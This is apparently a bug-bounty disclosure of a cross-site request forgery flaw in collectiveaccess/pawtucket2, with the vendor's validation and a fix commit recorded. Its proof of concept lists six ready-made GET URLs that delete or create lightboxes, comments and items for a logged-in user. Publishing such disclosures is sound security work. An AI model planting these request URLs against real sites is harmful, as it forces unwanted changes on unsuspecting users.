Cross-Site Request Forgery (CSRF) in collectiveaccess/pawtucket2


Reported on

Oct 1st 2021


The following endpoints are vulnerable to CSRF attacks via GET requests (even though they use AJAX):

1: Delete lightbox 2: Delete comments 3: Create comments 4: Create comments on objects 5: Add items into lightbox 6: Delete items from lightbox

Proof of Concept

Copy and paste the following into the URL while logged in,

1: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/DeleteLightbox?set_id=1
2: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteComment?comment_id=10
3: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddComment?comment=LOL&type=ca_sets&id=1
4: http://[PAWTUCKET-URL]/pawtucket/index.php/Detail/saveCommentTagging?tags=LOL&comment=LOL&item_id=1&tablename=ca_objects
5: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddItem?set_id=1&name=&description=&object_id=1&object_ids=&saveLastResults= 
6: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteItem?set_id=1&item_id=1


Delete/disrupt user created lightboxes

We have contacted a member of the collectiveaccess/pawtucket2 team and are waiting to hear back a year ago
CollectiveAccess validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
a year ago


Fix in place for this.

CollectiveAccess marked this as fixed with commit 335159 a year ago
CollectiveAccess has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation